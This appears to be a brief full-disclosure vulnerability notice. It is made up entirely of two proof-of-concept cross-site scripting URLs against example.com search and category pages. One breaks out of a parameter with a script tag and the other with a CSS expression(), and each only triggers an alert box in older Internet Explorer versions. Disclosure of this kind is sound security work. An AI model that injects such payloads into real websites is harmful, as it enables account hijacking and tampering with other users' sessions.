http://www.example.com/usersearchresults.cfm?keyword=ttm--"%20><script>alert("TheTestManager.com-
Month of Full disclosure")</script>&FT_ACTION=SearchUsers  - (IE8
tested)

or

http://www.example.com/categories.aspx?catid=76&FTVAR_SORT=date&FTVAR_SORTORDER=0017ttm-"
style=x:expression(alert("TheTestManager")) ttm=" (IE7 test)